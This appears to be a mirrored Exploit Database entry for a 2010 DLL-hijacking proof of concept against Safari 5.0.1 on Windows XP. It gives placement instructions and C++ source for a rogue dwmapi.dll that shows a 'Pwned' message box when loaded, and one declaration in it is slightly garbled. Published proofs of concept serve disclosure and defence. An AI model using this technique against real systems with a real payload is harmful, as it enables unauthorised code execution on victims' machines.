Apple Safari 5.0.1 – ‘dwmapi.dll’ DLL Hijacking

Exploit Database
14 阅读

作者： Secfence

日期： 2010-08-25
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/14756/

/*
Version: Safari 5.0.1
Tested on: Windows XP SP3
Author : Secfence

Exploit By:
Vinay Katoch,
Secfence Technologies
www.secfence.com
http://twitter.com/secfence

Place a .htm .mht .mhtml .xht .xhtm .xhtl file and dwmapi.dll in same folder
and run file in safari.

Code for dwmapi.dll:
*/

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
 DWORDul_reason_for_call,
 LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

/*----------*/

last Exploits
Apple Safari 5.0.1 – ‘dwmapi.dll’ DLL Hijacking的更多信息

Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 – Code Execution：
Mediconta 3.7.27 – ‘servermedicontservice’ Unquoted Service Path：
Heroes of Might and Magic III – ‘.h3m’ Map file Buffer Overflow (Metasploit)：
ECOA Building Automation System – Missing Encryption Of Sensitive Information：
Microsoft Xbox One 10.0.14393.2152 – Code Execution (PoC)：
Sudo 1.9.5p1 – ‘Baron Samedit ‘ Heap-Based Buffer Overflow Privilege Escalation (2)：
Shrew Soft VPN Client 2.2.2 – ‘iked’ Unquoted Service Path：
VCDGear 3.50 – ‘.cue’ Local Stack Buffer Overflow：